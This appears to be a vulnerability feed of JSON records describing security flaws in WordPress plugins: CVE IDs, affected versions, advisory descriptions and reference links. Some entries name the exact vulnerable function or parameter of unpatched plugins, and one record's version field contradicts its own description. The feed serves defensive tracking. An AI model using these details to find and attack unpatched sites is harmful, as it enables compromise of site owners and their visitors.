{"CVE_ID":"CVE-2023-1022","slug":"wp-meta-seo","versionImpact":"4.5.3","description":"The WP Meta SEO plugin for WordPress is vulnerable to unauthorized options update due to a missing capability check on the wpmsGGSaveInformation function in versions up to, and including, 4.5.3. This makes it possible for authenticated attackers with subscriber-level access to update google analytics options maintained by the plugin. This vulnerability occurred as a result of the plugin relying on nonce checks as a means of access control, and that nonce being accessible to all authenticated users regardless of role.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2870465\\\/wp-meta-seo\\\/trunk?contextall=1&old=2869205&old_path=%2Fwp-meta-seo%2Ftrunk#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2870465\\\/wp-meta-seo\\\/trunk?contextall=1&old=2869205&old_path=%2Fwp-meta-seo%2Ftrunk#file2\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2870465%40wp-meta-seo&new=2870465%40wp-meta-seo&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2870465%40wp-meta-seo&new=2870465%40wp-meta-seo&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/702f9d3b-5d33-4215-ac76-9aae3162d775\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/702f9d3b-5d33-4215-ac76-9aae3162d775\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2173","slug":"badgeos","versionImpact":"3.7.1.6","description":"The BadgeOS plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to, and including, 3.7.1.6. This is due to improper validation and authorization checks within the badgeos_delete_step_ajax_handler, badgeos_delete_award_step_ajax_handler, badgeos_delete_deduct_step_ajax_handler, and badgeos_delete_rank_req_step_ajax_handler functions. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to delete arbitrary posts.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/badgeos\\\/trunk\\\/includes\\\/steps-ui.php#L371\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/badgeos\\\/trunk\\\/includes\\\/steps-ui.php#L371\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ebb9e37c-9e8b-429b-b4ef-cd875351852c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ebb9e37c-9e8b-429b-b4ef-cd875351852c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/badgeos\\\/trunk\\\/includes\\\/points\\\/deduct-steps-ui.php#L441\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/badgeos\\\/trunk\\\/includes\\\/points\\\/deduct-steps-ui.php#L441\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/badgeos\\\/trunk\\\/includes\\\/points\\\/award-steps-ui.php#L384\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/badgeos\\\/trunk\\\/includes\\\/points\\\/award-steps-ui.php#L384\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/badgeos\\\/trunk\\\/includes\\\/ranks\\\/rank-steps-ui.php#L375\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/badgeos\\\/trunk\\\/includes\\\/ranks\\\/rank-steps-ui.php#L375\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5745","slug":"reusable-text-blocks","versionImpact":"1.5.3","description":"The Reusable Text Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'text-blocks' shortcode in versions up to, and including, 1.5.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with author-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/reusable-text-blocks\\\/tags\\\/1.5.3\\\/text-blocks.php#L319\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/reusable-text-blocks\\\/tags\\\/1.5.3\\\/text-blocks.php#L319\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0d627ee7-1175-4621-a477-1e9ec2d05eee?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0d627ee7-1175-4621-a477-1e9ec2d05eee?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4629","slug":"ladipage","versionImpact":"4.3","description":"The LadiApp plugin for WordPress is vulnerable to Cross-Site Request Forgery due to a missing nonce check on the save_config() function in versions up to, and including, 4.3. This makes it possible for unauthenticated attackers to update the 'ladipage_config' option via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea595e78-f4fc-491d-8143-c836302618d5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea595e78-f4fc-491d-8143-c836302618d5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ladipage\\\/trunk\\\/ladipage.php#L1971\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ladipage\\\/trunk\\\/ladipage.php#L1971\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3637","slug":"lead-form-builder","versionImpact":"1.8.9","description":"The Responsive Contact Form Builder & Lead Generation Plugin WordPress plugin through 1.8.9 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/33f6fea6-c784-40ae-a548-55d41618752d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/33f6fea6-c784-40ae-a548-55d41618752d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-34420","slug":"gplus-comments","versionImpact":"1.6.3","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in talspotim Comments Evolved for WordPress allows Stored XSS. This issue affects Comments Evolved for WordPress: from n\/a through 1.6.3.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/gplus-comments\\\/wordpress-comments-evolved-for-wordpress-plugin-1-6-3-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/gplus-comments\\\/wordpress-comments-evolved-for-wordpress-plugin-1-6-3-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3992","slug":"amen","versionImpact":"3.3.1","description":"The Amen WordPress plugin through 3.3.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e9fe3101-8033-4eee-8b37-06856872e9ef\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e9fe3101-8033-4eee-8b37-06856872e9ef\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5600","slug":"happy-scss-compiler","versionImpact":"1.3.10","description":"The SCSS Happy Compiler \u2013 Compile SCSS to CSS & Automatic Enqueue plugin for WordPress is vulnerable to Stored Cross-Site Scripting due to a missing capability check and insufficient sanitization on the import_settings() function in all versions up to, and including, 1.3.10. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject malicious web scripts.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d0ecffe-8543-4d82-a1cc-f2474499f373?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d0ecffe-8543-4d82-a1cc-f2474499f373?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-scss-compiler\\\/trunk\\\/admin\\\/class-hm-wp-scss-admin.php#L384\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/happy-scss-compiler\\\/trunk\\\/admin\\\/class-hm-wp-scss-admin.php#L384\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9655","slug":"kadence-blocks","versionImpact":"3.3.1","description":"The Gutenberg Blocks with AI by Kadence WP \u2013 Page Builder Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Icon widget in all versions up to, and including, 6.6.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4027138-9a8a-4602-90fd-19e9f7c45bb4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4027138-9a8a-4602-90fd-19e9f7c45bb4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kadence-blocks\\\/trunk\\\/includes\\\/assets\\\/js\\\/kb-tippy.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kadence-blocks\\\/trunk\\\/includes\\\/assets\\\/js\\\/kb-tippy.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.kadencewp.com\\\/kadence-blocks\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/www.kadencewp.com\\\/kadence-blocks\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/kadence-blocks\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/kadence-blocks\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fkadence-blocks&old=3162912&new_path=%2Fkadence-blocks&new=3170375&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fkadence-blocks&old=3162912&new_path=%2Fkadence-blocks&new=3170375&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11204","slug":"forumwp","versionImpact":"2.1.2","description":"The ForumWP \u2013 Forum & Discussion Board plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018url\u2019 parameter in all versions up to, and including, 2.1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forumwp\\\/tags\\\/2.1.1\\\/includes\\\/admin\\\/class-columns.php#L313\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forumwp\\\/tags\\\/2.1.1\\\/includes\\\/admin\\\/class-columns.php#L313\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/forumwp\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/forumwp\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd11abe3-8307-492b-beef-242fb21a4206?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd11abe3-8307-492b-beef-242fb21a4206?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12554","slug":"peters-custom-anti-spam-image","versionImpact":"3.2.3","description":"The Peter\u2019s Custom Anti-Spam plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.2.3. This is due to missing nonce validation on the cas_register_post() function. This makes it possible for unauthenticated attackers to blacklist emails via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peters-custom-anti-spam-image\\\/trunk\\\/custom_anti_spam.php#L1081\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/peters-custom-anti-spam-image\\\/trunk\\\/custom_anti_spam.php#L1081\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208894\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208894\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/peters-custom-anti-spam-image\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/peters-custom-anti-spam-image\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c52ca89-4f13-41da-bc10-80d212c6219c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c52ca89-4f13-41da-bc10-80d212c6219c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12885","slug":"connections","versionImpact":"10.4.66","description":"The Connections Business Directory plugin for WordPress is vulnerable to arbitrary directory deletion due to insufficient file path validation when deleting a connections image directory in all versions up to, and including, 10.4.66. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary folders on the server and all their content.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/connections\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/connections\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25e0c269-55c2-49f0-96bb-ae2696e2cea8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25e0c269-55c2-49f0-96bb-ae2696e2cea8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12410","slug":"front-end-only-users","versionImpact":"3.2.32","description":"The Front End Users plugin for WordPress is vulnerable to SQL Injection via the 'UserSearchField' parameter in all versions up to, and including, 3.2.32 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/front-end-only-users\\\/trunk\\\/html\\\/UsersPage.php#L55\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/front-end-only-users\\\/trunk\\\/html\\\/UsersPage.php#L55\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/975ddadd-12f8-4ace-9c1a-489114a2da6a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/975ddadd-12f8-4ace-9c1a-489114a2da6a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10634","slug":"nokaut-offers-box","versionImpact":"1.4.0","description":"The Nokaut Offers Box WordPress plugin through 1.4.0 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin reset the Nokaut Offers Box WordPress plugin through 1.4.0 via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/97de2ca3-ee64-480b-a5b0-7549533c2936\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/97de2ca3-ee64-480b-a5b0-7549533c2936\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5841","slug":"acf-onyx-poll","versionImpact":"1.1.9","description":"The ACF Onyx Poll plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018class\u2019 parameter in all versions up to, and including, 1.1.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/acf-onyx-poll\\\/tags\\\/1.1.8\\\/onyx-poll.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/acf-onyx-poll\\\/tags\\\/1.1.8\\\/onyx-poll.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/acf-onyx-poll\\\/tags\\\/1.2.0\\\/onyx-poll.php#L63\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/acf-onyx-poll\\\/tags\\\/1.2.0\\\/onyx-poll.php#L63\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/acf-onyx-poll\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/acf-onyx-poll\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f4302f8-e9da-436f-9b4b-d01d3dbe9f31?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f4302f8-e9da-436f-9b4b-d01d3dbe9f31?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7778","slug":"icons-factory","versionImpact":"1.6.12","description":"The Icons Factory plugin for WordPress is vulnerable to Arbitrary File Deletion due to insufficient authorization and improper path validation within the delete_files() function in all versions up to, and including, 1.6.12. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/icons-factory\\\/tags\\\/1.6.12\\\/icons-factory.php#L1330\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/icons-factory\\\/tags\\\/1.6.12\\\/icons-factory.php#L1330\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/icons-factory\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/icons-factory\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24f31bbf-883f-4903-847a-7bfc3e45654c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24f31bbf-883f-4903-847a-7bfc3e45654c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4303","slug":"wp-limit-login-attempts","versionImpact":"2.6.4","description":"The WP Limit Login Attempts WordPress plugin through 2.6.4 prioritizes getting a visitor's IP from certain HTTP headers over PHP's REMOTE_ADDR, which makes it possible to bypass IP-based restrictions on login forms.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8428a5e1-dbef-4516-983f-f95605c6dd09\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8428a5e1-dbef-4516-983f-f95605c6dd09\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-38468","slug":"nextgen-gallery","versionImpact":"3.28","description":"Cross-Site Request Forgery (CSRF) vulnerability in Imagely WordPress Gallery Plugin \u2013 NextGEN Gallery plugin <= 3.28 leading to thumbnail alteration.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/nextgen-gallery\\\/wordpress-wordpress-gallery-plugin-nextgen-gallery-plugin-3-28-cross-site-request-forgery-csrf?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/nextgen-gallery\\\/wordpress-wordpress-gallery-plugin-nextgen-gallery-plugin-3-28-cross-site-request-forgery-csrf?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36720","slug":"kali-forms","versionImpact":"2.1.1","description":"The Kali Forms plugin for WordPress is vulnerable to Authenticated Options Change in versions up to, and including, 2.1.1. This is due to the update_option lacking proper authentication checks. This makes it possible for any authenticated attacker to change (or delete) the plugin's settings.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ed8e24d-6bd0-4638-9031-997ce2228fad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ed8e24d-6bd0-4638-9031-997ce2228fad?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/kali-forms\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/kali-forms\\\/#developers\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-kali-forms-plugin-fixed-multiple-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-kali-forms-plugin-fixed-multiple-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-8934","slug":"google-site-kit","versionImpact":"1.8.0","description":"The Site Kit by Google plugin for WordPress is vulnerable to Sensitive Information Disclosure in versions up to, and including, 1.8.0. This is due to the lack of capability checks on the admin_enqueue_scripts action which displays the connection key. This makes it possible for authenticated attackers with any level of access to obtain owner access to a site in the Google Search Console. We recommend upgrading to V1.8.1 or above.\n","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/wordpress-plugins\\\/google-site-kit\\\/site-kit-by-google-171-sensitive-information-disclosure\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/wordpress-plugins\\\/google-site-kit\\\/site-kit-by-google-171-sensitive-information-disclosure\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2172","slug":"badgeos","versionImpact":"3.7.1.6","description":"The BadgeOS plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to, and including, 3.7.1.6. This is due to improper validation and authorization checks within the badgeos_update_steps_ajax_handler, badgeos_update_award_steps_ajax_handler, badgeos_update_deduct_steps_ajax_handler, and badgeos_update_ranks_req_steps_ajax_handler functions. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to overwrite arbitrary post titles.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5dae8e82-e252-48d9-ae1f-62acfcd17e2b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5dae8e82-e252-48d9-ae1f-62acfcd17e2b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/badgeos\\\/trunk\\\/includes\\\/points\\\/award-steps-ui.php#L397\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/badgeos\\\/trunk\\\/includes\\\/points\\\/award-steps-ui.php#L397\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/badgeos\\\/trunk\\\/includes\\\/points\\\/deduct-steps-ui.php#L454\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/badgeos\\\/trunk\\\/includes\\\/points\\\/deduct-steps-ui.php#L454\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/badgeos\\\/trunk\\\/includes\\\/ranks\\\/rank-steps-ui.php#L388\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/badgeos\\\/trunk\\\/includes\\\/ranks\\\/rank-steps-ui.php#L388\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/badgeos\\\/trunk\\\/includes\\\/steps-ui.php#L396\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/badgeos\\\/trunk\\\/includes\\\/steps-ui.php#L396\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4628","slug":"ladipage","versionImpact":"4.4","description":"The LadiApp plugin for WordPress is vulnerable to Cross-Site Request Forgery due to a missing nonce check on the ladiflow_save_hook() function in versions up to, and including, 4.4. This makes it possible for unauthenticated attackers to update the 'ladiflow_hook_configs' option via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0be418fa-f1cf-4aaf-bc94-c8e04186a54b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0be418fa-f1cf-4aaf-bc94-c8e04186a54b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ladipage\\\/trunk\\\/ladipage.php#L1983\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ladipage\\\/trunk\\\/ladipage.php#L1983\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-34418","slug":"wpcs-wp-custom-search","versionImpact":"1.1","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Tech9logy Creators WPCS ( WordPress Custom Search ) allows Stored XSS. This issue affects WPCS ( WordPress Custom Search ): from n\/a through 1.1.\n\n","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wpcs-wp-custom-search\\\/wordpress-wpcs-wordpress-custom-search-plugin-1-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wpcs-wp-custom-search\\\/wordpress-wpcs-wordpress-custom-search-plugin-1-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
